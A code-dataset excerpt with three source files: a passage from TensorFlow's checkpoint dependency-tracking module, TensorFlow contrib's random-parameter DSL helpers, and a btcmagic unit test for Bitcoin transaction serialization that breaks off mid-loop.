order the user specified them, and lets us fall back on assignment if an
initial value is not set (e.g. due to a custom getter interfering).
See comments in _add_variable_with_custom_getter for more information about
how `CheckpointInitialValue` is used.
"""
def __init__(self, checkpoint_position, shape=None):
self.wrapped_value = checkpoint_position.value_tensors()[
VARIABLE_VALUE_KEY]
if shape:
# We need to set the static shape information on the initializer if
# possible so we don't get a variable with an unknown shape.
self.wrapped_value.set_shape(shape)
self._checkpoint_position = checkpoint_position
def __getattr__(self, attr):
try:
return getattr(self.wrapped_value, attr)
except AttributeError:
return self.__getattribute__(attr)
@property
def checkpoint_position(self):
return self._checkpoint_position
class NoRestoreSaveable(saveable_object.SaveableObject):
"""Embeds a tensor in a checkpoint with no restore ops."""
def __init__(self, tensor, name, dtype=None):
spec = saveable_object.SaveSpec(tensor, "", name, dtype=dtype)
super(NoRestoreSaveable, self).__init__(tensor, [spec], name)
def restore(self, restored_tensors, restored_shapes):
return control_flow_ops.no_op()
@six.add_metaclass(abc.ABCMeta)
class PythonStateSaveable(saveable_object.SaveableObject):
"""An interface for saving/restoring volatile Python state."""
@abc.abstractmethod
def feed_dict_additions(self):
"""When running a graph, indicates fresh state to feed.
Returns:
A dictionary mapping `Tensor`s to current Python state.
"""
pass
@abc.abstractmethod
def freeze(self):
"""Create a new `SaveableObject` which freezes current state as a constant.
Used when executing eagerly to embed the current state as a constant, or
when creating a static tf.train.Saver with the frozen current Python state.
Returns:
A `SaveableObject` which is not a `PythonStateSaveable` instance (i.e. has
no Python state associated with it).
"""
pass
class PythonStringStateSaveable(PythonStateSaveable):
"""Saves Python state in a checkpoint."""
def __init__(self, name, state_callback, restore_callback=None):
"""Configure saving.
Args:
name: The checkpoint key to write to.
state_callback: A function taking no arguments which returns a
string. This function is run every time a checkpoint is written.
restore_callback: A function taking a Python string, used to restore
state. Optional; defaults to doing nothing.
"""
self._state_callback = state_callback
self._restore_callback = restore_callback
with ops.device("/cpu:0"):
self._save_string = constant_op.constant("", dtype=dtypes.string)
spec = saveable_object.SaveSpec(
self._save_string, "", name, dtype=dtypes.string)
super(PythonStringStateSaveable, self).__init__(
self._save_string, [spec], name)
def feed_dict_additions(self):
"""When running a graph, indicates fresh state to feed."""
return {self._save_string: self._state_callback()}
def freeze(self):
"""Create a frozen `SaveableObject` which saves the current state."""
return NoRestoreSaveable(
tensor=self._state_callback,
dtype=dtypes.string,
name=self.name)
def python_restore(self, restored_strings):
"""Called to restore Python state."""
if self._restore_callback:
restored, = restored_strings
self._restore_callback(restored)
def restore(self, restored_tensors, restored_shapes):
"""Called to restore TensorFlow state (nothing to do)."""
return control_flow_ops.no_op()
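# A hedged usage sketch (the `state` dict is hypothetical): persisting
# volatile Python state as a JSON string next to TensorFlow variables,
# using the constructor arguments documented above.
#
#   state = {"step_timestamps": []}
#   saveable = PythonStringStateSaveable(
#       name="py_state",
#       state_callback=lambda: json.dumps(state),
#       restore_callback=lambda s: state.update(json.loads(s)))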
class _CheckpointPosition(object):
"""Indicates a position within a `_Checkpoint`."""
def __init__(self, checkpoint, proto_id):
"""Specify an object within a checkpoint.
Args:
checkpoint: A _Checkpoint object.
proto_id: The index of this object in CheckpointableObjectGraph.nodes.
"""
self._checkpoint = checkpoint
self._proto_id = proto_id
def restore(self, checkpointable):
"""Restore this value into `checkpointable`."""
with ops.init_scope():
if self.bind_object(checkpointable):
# This object's correspondence with a checkpointed object is new, so
# process deferred restorations for it and its dependencies.
restore_ops = checkpointable._restore_from_checkpoint_position(self) # pylint: disable=protected-access
if restore_ops:
self._checkpoint.new_restore_ops(restore_ops)
def bind_object(self, checkpointable):
"""Set a checkpoint<->object correspondence and process slot variables.
Args:
checkpointable: The object to record a correspondence for.
Returns:
True if this is a new assignment, False if this object has already been
mapped to a checkpointed `Object` proto.
Raises:
AssertionError: If another object is already bound to the `Object` proto.
"""
checkpoint = self.checkpoint
checkpoint.all_python_objects.add(checkpointable)
current_assignment = checkpoint.object_by_proto_id.get(self._proto_id, None)
if current_assignment is None:
checkpoint.object_by_proto_id[self._proto_id] = checkpointable
for deferred_slot_restoration in (
checkpoint.deferred_slot_restorations.pop(self._proto_id, ())):
checkpointable._create_or_restore_slot_variable( # pylint: disable=protected-access
slot_variable_position=_CheckpointPosition(
checkpoint=checkpoint,
proto_id=deferred_slot_restoration.slot_variable_id),
variable=deferred_slot_restoration.original_variable,
slot_name=deferred_slot_restoration.slot_name)
for slot_restoration in checkpoint.slot_restorations.pop(
self._proto_id, ()):
optimizer_object = checkpoint.object_by_proto_id.get(
slot_restoration.optimizer_id, None)
if optimizer_object is None:
# The optimizer has not yet been created or tracked. Record in the
# checkpoint that the slot variables need to be restored when it is.
checkpoint.deferred_slot_restorations.setdefault(
slot_restoration.optimizer_id, []).append(
_DeferredSlotVariableRestoration(
original_variable=checkpointable,
slot_variable_id=slot_restoration.slot_variable_id,
slot_name=slot_restoration.slot_name))
else:
optimizer_object._create_or_restore_slot_variable( # pylint: disable=protected-access
slot_variable_position=_CheckpointPosition(
checkpoint=checkpoint,
proto_id=slot_restoration.slot_variable_id),
variable=checkpointable,
slot_name=slot_restoration.slot_name)
return True # New assignment
else:
# The object was already mapped for this checkpoint load, which means
# we don't need to do anything besides check that the mapping is
# consistent (if the dependency DAG is not a tree then there are
# multiple paths to the same object).
if current_assignment is not checkpointable:
logging.warning(
("Inconsistent references when loading the checkpoint into this "
"object graph. Either the Checkpointable object references in the "
"Python program have changed in an incompatible way, or the "
"checkpoint was generated in an incompatible program.\n\nTwo "
"checkpoint references resolved to different objects (%s and %s).")
% (current_assignment, checkpointable))
return False # Not a new assignment
def is_simple_variable(self):
"""Determine whether this value is restorable with a Tensor initializer."""
attributes = self.object_proto.attributes
return (len(attributes) == 1
and attributes[0].name == VARIABLE_VALUE_KEY
and not self.object_proto.children)
def value_tensors(self):
"""Create value `Tensor`s for this object's attributes.
Does not require that the Python object has been created. Used for
restore-on-create when executing eagerly.
Returns:
A dictionary mapping from object attribute names to `Tensor`s.
"""
value_tensors = {}
for serialized_tensor in self.object_proto.attributes:
checkpoint_key = serialized_tensor.checkpoint_key
dtype = self._checkpoint.dtype_map[checkpoint_key]
base_type = dtype.base_dtype
with ops.init_scope():
with ops.device("/cpu:0"):
# Run the restore itself on the CPU.
value, = io_ops.restore_v2(
prefix=self._checkpoint.save_path_tensor,
tensor_names=[checkpoint_key],
shape_and_slices=[""],
dtypes=[base_type],
name="%s_checkpoint_read" % (serialized_tensor.name,))
# Copy the value to the current device if necessary.
value_tensors[serialized_tensor.name] = array_ops.identity(value)
return value_tensors
def _gather_ops_or_named_saveables(self):
"""Looks up or creates SaveableObjects which don't have cached ops."""
saveables = self.checkpointable._gather_saveables_for_checkpoint() # pylint: disable=protected-access
# Name saveables based on the name this object had when it was checkpointed.
named_saveables = {}
python_saveables = []
existing_restore_ops = []
for serialized_tensor in self.object_proto.attributes:
if context.executing_eagerly():
existing_op = None
else:
existing_op = self._checkpoint.restore_ops_by_name.get(
serialized_tensor.checkpoint_key, None)
if existing_op is not None:
existing_restore_ops.append(existing_op)
continue
# Only if we don't have cached ops for this SaveableObject, we'll see if
# the SaveableObject itself has been cached. If not, we'll make it, and
# either way we'll extract new ops from it (or if it has Python state to
# restore, we'll run that).
if self._checkpoint.saveable_object_cache is None:
# No SaveableObject caching when executing eagerly.
saveable = None
else:
# If we've already created and cached a SaveableObject for this
# attribute, we can re-use it to avoid re-creating some ops when graph
# building.
saveable_list = self._checkpoint.saveable_object_cache.get(
self.checkpointable, {}).get(serialized_tensor.name, (None,))
if len(saveable_list) == 1:
# Almost every attribute will have exactly one SaveableObject.
saveable, = saveable_list
else:
# Don't use cached SaveableObjects for partitioned variables, which is
# the only case where we'd have a list of SaveableObjects. Op caching
# will catch them.
saveable = None
if saveable is not None:
# The name of this attribute has changed, so we need to re-generate
# the SaveableObject.
if serialized_tensor.checkpoint_key not in saveable.name:
saveable = None
del self._checkpoint.saveable_object_cache[self.checkpointable]
break
if saveable is None:
# If there was no cached SaveableObject, we should check if the Python
# object has the attribute.
saveable_factory = saveables.get(serialized_tensor.name, None)
if saveable_factory is None:
# Purposefully does not throw an exception if attributes have been
# added or deleted. Stores unused attributes so an exception can be
# raised if the user decides to check that everything in the
# checkpoint was loaded.
self._checkpoint.unused_attributes.setdefault(
self.checkpointable, []).append(serialized_tensor.name)
continue
if callable(saveable_factory):
saveable = saveable_factory(name=serialized_tensor.checkpoint_key)
else:
saveable = saveable_factory
if self._checkpoint.saveable_object_cache is not None:
self._checkpoint.saveable_object_cache.setdefault(
self.checkpointable, {})[serialized_tensor.name] = [saveable]
if isinstance(saveable, PythonStateSaveable):
python_saveables.append(saveable)
else:
named_saveables[serialized_tensor.checkpoint_key] = saveable
return existing_restore_ops, named_saveables, python_saveables
def restore_ops(self):
"""Create or fetch restore ops for this object's attributes.
Requires that the `Checkpointable` Python object has been bound to an object
ID in the checkpoint.
Returns:
A list of operations when graph building, or an empty list when executing
eagerly.
"""
(restore_ops,
named_saveables,
python_saveables) = self._gather_ops_or_named_saveables()
# Eagerly run restorations for Python state.
reader = pywrap_tensorflow.NewCheckpointReader(
self._checkpoint.save_path_string)
for saveable in python_saveables:
spec_names = [spec.name for spec in saveable.specs]
saveable.python_restore(
[reader.get_tensor(name) for name in spec_names])
# If we have new SaveableObjects, extract and cache restore ops.
if named_saveables:
validated_saveables = (
self._checkpoint.builder._ValidateAndSliceInputs(named_saveables)) # pylint: disable=protected-access
validated_names = set(saveable.name for saveable in validated_saveables)
if set(named_saveables.keys()) != validated_names:
raise AssertionError(
("Saveable keys changed when validating. Got back %s, was "
"expecting %s") % (named_saveables.keys(), validated_names))
all_tensors = self._checkpoint.builder.bulk_restore(
filename_tensor=self._checkpoint.save_path_tensor,
saveables=validated_saveables, preferred_shard=-1,
restore_sequentially=False)
saveable_index = 0
for saveable in validated_saveables:
num_specs = len(saveable.specs)
saveable_tensors = all_tensors[
saveable_index:saveable_index + num_specs]
saveable_index += num_specs
restore_op = saveable.restore(saveable_tensors, restored_shapes=None)
if not context.executing_eagerly():
assert saveable.name not in self._checkpoint.restore_ops_by_name
self._checkpoint.restore_ops_by_name[saveable.name] = restore_op
restore_ops.append(restore_op)
return restore_ops
@property
def checkpoint(self):
return self._checkpoint
@property
def checkpointable(self):
return self._checkpoint.object_by_proto_id[self._proto_id]
@property
def object_proto(self):
return self._checkpoint.object_graph_proto.nodes[self._proto_id]
@property
def restore_uid(self):
return self._checkpoint.restore_uid
def __repr__(self):
return repr(self.object_proto)
_DeferredSlotVariableRestoration = collections.namedtuple(
"_DeferredSlotVariableRestoration",
[
"original_variable",
"slot_variable_id",
"slot_name",
]
)
_SlotVariableRestoration = collections.namedtuple(
"_SlotVariableRestoration",
[
# The checkpoint proto id of the optimizer object.
"optimizer_id",
# The checkpoint proto id of the slot variable.
"slot_variable_id",
"slot_name",
])
def no_automatic_dependency_tracking(method):
"""Disables automatic dependency tracking on attribute assignment.
Use to decorate any method of a Checkpointable object. Attribute assignment in
that method will not add dependencies (also respected in Model). Harmless if
used in a class which does not do automatic dependency tracking (which means
it's safe to use in base classes which may have subclasses which also inherit
from Checkpointable).
Args:
method: The method to decorate.
Returns:
A decorated method which sets and un-sets automatic dependency tracking for
the object the method is called on (not thread safe).
"""
def _method_wrapper(self, *args, **kwargs):
previous_value = getattr(self, "_setattr_tracking", True)
self._setattr_tracking = False # pylint: disable=protected-access
try:
method(self, *args, **kwargs)
finally:
self._setattr_tracking = previous_value # pylint: disable=protected-access
return tf_decorator.make_decorator(
target=method, decorator_func=_method_wrapper)
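# A minimal usage sketch (the class and method names below are hypothetical,
# not part of this module): decorating a method suppresses dependency
# tracking for attribute assignments made inside it.
#
#   class Preprocessor(Checkpointable):
#
#     @no_automatic_dependency_tracking
#     def _build_scratch_state(self):
#       self._scratch = []  # Not tracked as a checkpoint dependency.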
class CheckpointableBase(object):
"""Base class for `Checkpointable` objects without automatic dependencies.
This class has no __setattr__ override for performance reasons. Dependencies
must be added explicitly. Unless attribute assignment is performance-critical,
use `Checkpointable` instead. Use `CheckpointableBase` for `isinstance`
checks.
"""
# CheckpointableBase does not do automatic dependency tracking, but uses the
# no_automatic_dependency_tracking decorator so it can avoid adding
# dependencies if a subclass is Checkpointable / inherits from Model (both of
# which have __setattr__ overrides).
@no_automatic_dependency_tracking
def _maybe_initialize_checkpointable(self):
"""Initialize dependency management.
Not __init__, since most objects will forget to call it.
"""
if hasattr(self, "_unconditional_checkpoint_dependencies"):
# __init__ already called. This check means that we don't need
# Checkpointable.__init__() in the constructor of every TensorFlow object.
return
# A list of CheckpointableReference objects. Some classes implementing
# `Checkpointable`, notably `Optimizer`s, may override the
# _checkpoint_dependencies property with conditional dependencies
# (e.g. based on the current graph when saving).
self._unconditional_checkpoint_dependencies = []
# Maps names -> Checkpointable objects
self._unconditional_dependency_names = {}
# Restorations for other Checkpointable objects on which this object may
# eventually depend. Maps local name -> _CheckpointPosition list. Optimizers
# tack on conditional dependencies, and so need separate management of
# deferred dependencies too.
self._unconditional_deferred_dependencies = {}
# The UID of the highest assignment to this object. Used to ensure that the
# last requested assignment determines the final value of an object.
if hasattr(self, "_update_uid"):
raise AssertionError(
"Internal error: the object had an update UID set before its "
"initialization code was run.")
self._update_uid = -1
# When executing eagerly, holds a collection of _NameBasedRestoreCoordinator
# instances, which should be checked when creating variables or other
# saveables. These are passed on recursively to all dependencies, since
# unlike object-based checkpoint restores we don't know which subgraph is
# being restored in advance. This mechanism is only necessary for
# restore-on-create when executing eagerly, and so is unused when graph
# building.
self._name_based_restores = set()
def _no_dependency(self, value):
"""If automatic dependency tracking is enabled, ignores `value`."""
return value
def _name_based_attribute_restore(self, checkpoint):
"""Restore the object's attributes from a name-based checkpoint."""
self._name_based_restores.add(checkpoint)
if self._update_uid < checkpoint.restore_uid:
checkpoint.eager_restore(self)
self._update_uid = checkpoint.restore_uid
@property
def _checkpoint_dependencies(self):
"""All dependencies of this object.
May be overridden to include conditional dependencies.
Returns:
A list of `CheckpointableReference` objects indicating named
`Checkpointable` dependencies which should be saved along with this
object.
"""
return self._unconditional_checkpoint_dependencies
@property
def _deferred_dependencies(self):
"""A dictionary with deferred dependencies.
Stores restorations for other Checkpointable objects on which this object
may eventually depend. May be overridden by sub-classes (e.g. Optimizers use
    conditional dependencies based on the current graph, and so need separate
management of deferred dependencies too).
Returns:
A dictionary mapping from local name to a list of _CheckpointPosition
objects.
"""
return self._unconditional_deferred_dependencies
def _lookup_dependency(self, name):
"""Look up a dependency by name.
May be overridden to include conditional dependencies.
Args:
name: The local name of the dependency.
Returns:
A `Checkpointable` object, or `None` if no dependency by this name was
found.
"""
return self._unconditional_dependency_names.get(name, None)
def _add_variable_with_custom_getter(
self, name, shape=None, dtype=dtypes.float32,
initializer=None, getter=None, overwrite=False,
**kwargs_for_getter):
"""Restore-on-create for a variable be saved with this `Checkpointable`.
If the user has requested that this object or another `Checkpointable` which
depends on this object be restored from a checkpoint (deferred loading
before variable object creation), `initializer` may be ignored and the value
from the checkpoint used instead.
Args:
name: A name for the variable. Must be unique within this object.
shape: The shape of the variable.
dtype: The data type of the variable.
initializer: The initializer to use. Ignored if there is a deferred
restoration left over from a call to
`_restore_from_checkpoint_position`.
getter: The getter to wrap which actually fetches the variable.
overwrite: If True, disables unique name and type checks.
**kwargs_for_getter: Passed to the getter.
Returns:
The new variable object.
Raises:
ValueError: If the variable name is not unique.
"""
self._maybe_initialize_checkpointable()
with ops.init_scope():
if context.executing_eagerly():
# If this is a variable with a single Tensor stored in the checkpoint,
# we can set that value as an initializer rather than initializing and
# then assigning (when executing eagerly). This call returns None if
# there is nothing to restore.
checkpoint_initializer = self._preload_simple_restoration(
name=name, shape=shape)
else:
checkpoint_initializer = None
if (checkpoint_initializer is not None
and not (
isinstance(initializer, CheckpointInitialValue)
and (initializer.restore_uid
> checkpoint_initializer.restore_uid))):
# If multiple Checkpointable objects are "creating" the same variable
# via the magic of custom getters, the one with the highest restore UID
# (the one called last) has to make the final initializer. If another
# custom getter interrupts this process by overwriting the initializer,
# then we'll catch that when we call _track_checkpointable. So this is
# "best effort" to set the initializer with the highest restore UID.
initializer = checkpoint_initializer
shape = None
new_variable = getter(
name=name, shape=shape, dtype=dtype, initializer=initializer,
**kwargs_for_getter)
# If we set an initializer and the variable processed it, tracking will not
# assign again. It will add this variable to our dependencies, and if there
# is a non-trivial restoration queued, it will handle that. This also
# handles slot variables.
if not overwrite or isinstance(new_variable, CheckpointableBase):
return self._track_checkpointable(new_variable, name=name,
overwrite=overwrite)
else:
# TODO(allenl): Some variable types are not yet supported. Remove this
# fallback once all get_variable() return types are Checkpointable.
return new_variable
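  # Example (sketch; `my_getter` is a hypothetical callable with the variable
  # getter signature used above):
  #
  #   var = obj._add_variable_with_custom_getter(
  #       name="bias", shape=[10], getter=my_getter)
  #
  # If a deferred checkpoint restore is pending for "bias", its saved value
  # is used in place of the initializer.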
def _preload_simple_restoration(self, name, shape):
"""Return a dependency's value for restore-on-create.
Note the restoration is not deleted; if for some reason preload is called
and then not assigned to the variable (for example because a custom getter
overrides the initializer), the assignment will still happen once the
variable is tracked (determined based on checkpoint.restore_uid).
Args:
name: The object-local name of the dependency holding the variable's
value.
shape: The shape of the variable being loaded into.
Returns:
      A callable for use as a variable's initializer/initial_value, or None if
one should not be set (either because there was no variable with this name
in the checkpoint or because it needs more complex deserialization). Any
non-trivial deserialization will happen when the variable object is
tracked.
"""
deferred_dependencies_list = self._deferred_dependencies.get(name, ())
if not deferred_dependencies_list:
# Nothing to do; we don't have a restore for this dependency queued up.
return
for checkpoint_position in deferred_dependencies_list:
if not checkpoint_position.is_simple_variable():
# If _any_ pending restoration is too complicated to fit in an
# initializer (because it has dependencies, or because there are
# multiple Tensors to restore), bail and let the general tracking code
# handle it.
return None
checkpoint_position = max(
deferred_dependencies_list,
key=lambda restore: restore.checkpoint.restore_uid)
return CheckpointInitialValue(
checkpoint_position=checkpoint_position, shape=shape)
def _track_checkpointable(self, checkpointable, name, overwrite=False):
"""Declare a dependency on another `Checkpointable` object.
Indicates that checkpoints for this object should include variables from
`checkpointable`.
Variables in a checkpoint are mapped to `Checkpointable`s based on the names
provided when the checkpoint was written. To avoid breaking existing
checkpoints when modifying a class, neither variable names nor dependency
names (the names passed to `_track_checkpointable`) may change.
Args:
checkpointable: A `Checkpointable` which this object depends on.
name: A local name for `checkpointable`, used for loading checkpoints into
the correct objects.
overwrite: Boolean, whether silently replacing dependencies is OK. Used
for __setattr__, where throwing an error on attribute reassignment would
be inappropriate.
Returns:
`checkpointable`, for convenience when declaring a dependency and
assigning to a member variable in one statement.
Raises:
TypeError: If `checkpointable` does not inherit from `Checkpointable`.
ValueError: If another object is already tracked by this name.
"""
self._maybe_initialize_checkpointable()
if not isinstance(checkpointable, CheckpointableBase):
raise TypeError(
("Checkpointable._track_checkpointable() passed type %s, not a "
"Checkpointable.") % (type(checkpointable),))
new_reference = CheckpointableReference(name=name, ref=checkpointable)
current_object = self._lookup_dependency(name)
if (current_object is not None
and current_object is not checkpointable):
if not overwrite:
raise ValueError(
("Called Checkpointable._track_checkpointable() with name='%s', "
"but a Checkpointable with this name is already declared as a "
"dependency. Names must be unique (or overwrite=True).") % (name,))
# This is a weird thing to do, but we're not going to stop people from
# using __setattr__.
for index, (old_name, _) in enumerate(
self._unconditional_checkpoint_dependencies):
if name == old_name:
self._unconditional_checkpoint_dependencies[index] = new_reference
elif current_object is None:
self._unconditional_checkpoint_dependencies.append(new_reference)
self._handle_deferred_dependencies(
name=name, checkpointable=checkpointable)
self._unconditional_dependency_names[name] = checkpointable
return checkpointable
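  # Example (sketch; `child` stands for any `CheckpointableBase` instance):
  #
  #   self.child = self._track_checkpointable(child, name="child")
  #
  # declares the dependency and assigns the attribute in one statement.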
def _handle_deferred_dependencies(self, name, checkpointable):
"""Pop and load any deferred checkpoint restores into `checkpointable`.
This method does not add a new dependency on `checkpointable`, but it does
check if any outstanding/deferred dependencies have been queued waiting for
this dependency to be added (matched based on `name`). If so,
`checkpointable` and its dependencies are restored. The restorations are
considered fulfilled and so are deleted.
`_track_checkpointable` is more appropriate for adding a
normal/unconditional dependency, and includes handling for deferred
restorations. This method allows objects such as `Optimizer` to use the same
restoration logic while managing conditional dependencies themselves, by
overriding `_checkpoint_dependencies` and `_lookup_dependency` to change the
object's dependencies based on the context it is saved/restored in (a single
optimizer instance can have state associated with multiple graphs).
Args:
name: The name of the dependency within this object (`self`), used to
match `checkpointable` with values saved in a checkpoint.
checkpointable: The Checkpointable object to restore (inheriting from
`CheckpointableBase`).
"""
self._maybe_initialize_checkpointable()
checkpointable._maybe_initialize_checkpointable() # pylint: disable=protected-access
deferred_dependencies_list = self._deferred_dependencies.pop(name, ())
for checkpoint_position in sorted(
deferred_dependencies_list,
key=lambda restore: restore.checkpoint.restore_uid,
reverse=True):
checkpoint_position.restore(checkpointable)
# Pass on any name-based restores queued in this object.
for name_based_restore in sorted(
self._name_based_restores,
key=lambda checkpoint: checkpoint.restore_uid,
reverse=True):
checkpointable._name_based_attribute_restore(name_based_restore) # pylint: disable=protected-access
def _restore_from_checkpoint_position(self, checkpoint_position):
"""Restore this object and its dependencies (may be deferred)."""
# Attempt a breadth-first traversal, since presumably the user has more
# control over shorter paths. If we don't have all of the dependencies at
# this point, the end result is not breadth-first (since other deferred
# traversals will happen later).
visit_queue = collections.deque([checkpoint_position])
restore_ops = []
while visit_queue:
current_position = visit_queue.popleft()
restore_ops.extend(nest.flatten(
current_position.checkpointable # pylint: disable=protected-access
._single_restoration_from_checkpoint_position(
checkpoint_position=current_position,
visit_queue=visit_queue)))
return restore_ops
def _single_restoration_from_checkpoint_position(
self, checkpoint_position, visit_queue):
"""Restore this object, and either queue its dependencies or defer them."""
self._maybe_initialize_checkpointable()
checkpoint = checkpoint_position.checkpoint
# If the UID of this restore is lower than our current update UID, we don't
# need to actually restore the object. However, we should pass the
# restoration on to our dependencies.
if checkpoint.restore_uid > self._update_uid:
restore_ops = checkpoint_position.restore_ops()
self._update_uid = checkpoint.restore_uid
else:
restore_ops = ()
for child in checkpoint_position.object_proto.children:
child_position = _CheckpointPosition(
checkpoint=checkpoint,
proto_id=child.node_id)
local_object = self._lookup_dependency(child.local_name)
if local_object is None:
# We don't yet have a dependency registered with this name. Save it
# in case we do.
self._deferred_dependencies.setdefault(child.local_name, []).append(
child_position)
else:
if child_position.bind_object(checkpointable=local_object):
# This object's correspondence is new, so dependencies need to be
# visited. Delay doing it so that we get a breadth-first dependency
# resolution order (shallowest paths first). The caller is responsible
# for emptying visit_queue.
visit_queue.append(child_position)
return restore_ops
def _gather_saveables_for_checkpoint(self):
"""Returns a dictionary of values to checkpoint with this object.
Keys in the returned dictionary are local to this object and in a separate
namespace from dependencies. Values may either be `SaveableObject` factories
or variables easily converted to `SaveableObject`s (as in `tf.train.Saver`'s
`var_list` constructor argument).
`SaveableObjects` have a name set, which Checkpointable needs to generate
itself. So rather than returning `SaveableObjects` directly, this method
should return a dictionary of callables which take `name` arguments and
return `SaveableObjects` with that name.
If this object may also be passed to the global-name-based `tf.train.Saver`,
the returned callables should have a default value for their name argument
(i.e. be callable with no arguments).
Returned values must be saved only by this object; if any value may be
shared, it should instead be a dependency. For example, variable objects
save their own values with the key `VARIABLE_VALUE_KEY`, but objects which
reference variables simply add a dependency.
Returns:
The dictionary mapping attribute names to `SaveableObject` factories
described above. For example:
{VARIABLE_VALUE_KEY:
lambda name="global_name_for_this_object":
SaveableObject(name=name, ...)}
"""
if not hasattr(self, "get_config"):
return {}
try:
self.get_config()
except NotImplementedError:
return {}
weak_self = weakref.ref(self)
def _state_callback():
dereferenced_self = weak_self()
if dereferenced_self:
return json.dumps(dereferenced_self,
default=serialization.get_json_type,
sort_keys=True).encode("utf8")
else:
return ""
return {OBJECT_CONFIG_JSON_KEY: functools.partial(
PythonStringStateSaveable,
state_callback=_state_callback)}
|
benoitsteiner/tensorflow-xsmm
|
refs/heads/master
|
tensorflow/contrib/specs/python/params_ops.py
|
186
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operators for concise TensorFlow parameter specifications.
This module is used as an environment for evaluating expressions
in the "params" DSL.
Specifications are intended to assign simple numerical
values. Examples:
--params "n=64; d=5" --spec "(Cr(n) | Mp([2, 2])) ** d | Fm"
The random parameter primitives are useful for running large numbers
of experiments with randomly distributed parameters:
--params "n=Li(5,500); d=Ui(1,5)" --spec "(Cr(n) | Mp([2, 2])) ** d | Fm"
Internally, this might be implemented as follows:
params = specs.create_params(FLAGS.params, {})
logging.info(repr(params))
net = specs.create_net(FLAGS.spec, inputs, params)
Note that separating the specifications into parameters and network
creation allows us to log the random parameter values easily.
The implementation of this will change soon in order to support
hyperparameter tuning with steering. Instead of returning a number,
the primitives below will return a class instance that is then
used to generate a random number by the framework.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Lint disabled because these are operators in the DSL, not regular
# Python functions.
# pylint: disable=invalid-name
# pylint: disable=wildcard-import,unused-wildcard-import,redefining-builtin
# pylint: disable=redefined-builtin,g-importing-member,no-member
# make available all math expressions
import math
from math import *
import random
# pylint: enable=wildcard-import,unused-wildcard-import,redefining-builtin
# pylint: enable=redefined-builtin,g-importing-member,no-member
def Uf(lo=0.0, hi=1.0):
"""Uniformly distributed floating number."""
return random.uniform(lo, hi)
def Ui(lo, hi):
"""Uniformly distributed integer, inclusive limits."""
return random.randint(lo, hi)
def Lf(lo, hi):
"""Log-uniform distributed floatint point number."""
return math.exp(random.uniform(math.log(lo), math.log(hi)))
def Li(lo, hi):
"""Log-uniform distributed integer, inclusive limits."""
return int(math.floor(math.exp(random.uniform(math.log(lo),
math.log(hi+1-1e-5)))))
def Nt(mu, sigma, limit=3.0):
"""Normally distributed floating point number with truncation."""
return min(max(random.gauss(mu, sigma), mu-limit*sigma), mu+limit*sigma)
# pylint: enable=invalid-name
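if __name__ == "__main__":
  # Smoke-test sketch (not part of the DSL): draw one sample from each
  # primitive and print it. The ranges below are arbitrary examples.
  for name, value in [("Uf", Uf(0.0, 1.0)), ("Ui", Ui(1, 5)),
                      ("Lf", Lf(1e-4, 1e-1)), ("Li", Li(5, 500)),
                      ("Nt", Nt(0.0, 1.0))]:
    print("%s -> %s" % (name, value))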
|
Dirbaio/btcmagic
|
refs/heads/master
|
btcmagic/test_transaction.py
|
1
|
from unittest import TestCase
from btcmagic import transaction, convert
import os
import json
class TestTransaction(TestCase):
def setUp(self):
self.tx_bin = convert.hex_to_bytes(
'0100000001637aaf20d708fcff67bb688af6e41d1807e6883f736c50eacb6042bf6e6c829c010000008c493046022100da1e59d78bb88ca7c3e13a4a6f4e259d5dd8cb177d5f79199bf024b1f57121d50221008d1d9838606a62ed4bd011a6ce8a2042ae2dc38fd05381b50aa388a1c8bd9150014104d3b615c609e48ae81389f6617b50473bf4c93f63c9853cd038aa4f00a989ebd62ae8253555e24c88b939817da18cd4e7263fda6a0e815097589bb90a5a6b3ff1ffffffff03b9000000000000001976a9149fe14d50c95abd6ecddc5d61255cfe5aebeba7e988ac57300f00000000001976a914c0492db5f283a22274ef378cdffbe5ecbe29862b88ac00000000000000000a6a0810e2cdc1af05180100000000')
self.tx_obj = {
'ins': [
{
'sequence': 4294967295,
'script': b'I0F\x02!\x00\xda\x1eY\xd7\x8b\xb8\x8c\xa7\xc3\xe1:JoN%\x9d]\xd8\xcb\x17}_y\x19\x9b\xf0$\xb1\xf5q!\xd5\x02!\x00\x8d\x1d\x988`jb\xedK\xd0\x11\xa6\xce\x8a B\xae-\xc3\x8f\xd0S\x81\xb5\n\xa3\x88\xa1\xc8\xbd\x91P\x01A\x04\xd3\xb6\x15\xc6\t\xe4\x8a\xe8\x13\x89\xf6a{PG;\xf4\xc9?c\xc9\x85<\xd08\xaaO\x00\xa9\x89\xeb\xd6*\xe8%5U\xe2L\x88\xb99\x81}\xa1\x8c\xd4\xe7&?\xdaj\x0e\x81P\x97X\x9b\xb9\nZk?\xf1',
'outpoint': {'index': 1, 'hash': b'\x9c\x82ln\xbfB`\xcb\xeaPls?\x88\xe6\x07\x18\x1d\xe4\xf6\x8ah\xbbg\xff\xfc\x08\xd7 \xafzc'}
}
],
'locktime': 0,
'version': 1,
'outs': [
{
'value': 185,
'script': b'v\xa9\x14\x9f\xe1MP\xc9Z\xbdn\xcd\xdc]a%\\\xfeZ\xeb\xeb\xa7\xe9\x88\xac'
},
{
'value': 995415,
'script': b'v\xa9\x14\xc0I-\xb5\xf2\x83\xa2"t\xef7\x8c\xdf\xfb\xe5\xec\xbe)\x86+\x88\xac'
},
{
'value': 0,
'script': b'j\x08\x10\xe2\xcd\xc1\xaf\x05\x18\x01'
}
]
}
def test_deserialization(self):
tx_obj = transaction.deserialize(self.tx_bin)
self.assertEqual(tx_obj, self.tx_obj)
def test_serialization(self):
tx_bin = transaction.serialize(self.tx_obj)
self.assertEqual(tx_bin, self.tx_bin)
class TestSighash(TestCase):
def setUp(self):
loc = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
with open(os.path.join(loc, 'sighash.json')) as f:
self.data = json.load(f)
def test_sighash(self):
first = True
for vector in self.data:
# Ignore first header row in the JSON.
if first:
first = False
continue
tx = transaction.deserialize(convert.hex_to_bytes(vector[0]))
script = convert.hex_to_bytes(vector[1])
index = int(vector[2])
